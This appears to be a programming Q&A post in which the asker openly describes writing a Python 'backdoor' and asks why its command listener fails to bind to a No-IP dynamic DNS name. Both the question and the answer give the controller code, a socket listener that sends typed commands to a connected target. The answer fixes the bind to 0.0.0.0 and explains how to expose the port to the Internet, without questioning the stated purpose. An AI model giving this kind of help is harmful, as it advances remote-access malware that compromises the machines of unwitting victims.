# How to connect a python backdoor to No-IP DNS

Tags: python-3.x, sockets

i'm programing a backdoor in python 3.9.1, My question is how can I connect it to my noip dns, when I use my private ip it works normally, but when I try to use the dns address it gives me an error, here is the code:

```
import socket

def connection():
    global s
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(('testtest123.ddns.net', 4445))
    s.listen(1)
    print("waiting...")

def accept_connections():
    global target

    target, ip_list = s.accept()

    print("connection received from: " + str(ip_list[0]))

def commands():
    while True:
        command = input('command> ')
        bit_encoded_command = str.encode(command)
        if command == 'exit':
            target.send(bit_encoded_command)
            receive = target.recv(1024)
            receive_decoded = bytes.decode(receive, "utf-8")
            print(receive_decoded)
            break

connection()
accept_connections()
commands()
s.close()
```

and the error is:

"OSError: [WinError 10049] The requested address is not valid in its context"

Answer (score 0):

First of all, I recommend you not to use global variables.

As suggested by the error message, you cannot bind that address to your network interface. Use `0.0.0.0` instead and your program will handle all incoming requests.
You will then have to make sure that `testtest123.ddns.net` points to the machine running your code and that the port you specified is open (i.e. accessible by everyone on the Internet).

E.g.

```
import socket

def connection():
    global s
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(('0.0.0.0', 4445))
    s.listen(1)
    print("waiting...")

def accept_connections():
    global target

    target, ip_list = s.accept()

    print("connection received from: " + str(ip_list[0]))

def commands():
    while True:
        command = input('command> ')
        bit_encoded_command = str.encode(command)
        if command == 'exit':
            target.send(bit_encoded_command)
            receive = target.recv(1024)
            receive_decoded = bytes.decode(receive, "utf-8")
            print(receive_decoded)
            break

connection()
accept_connections()
commands()
s.close()
```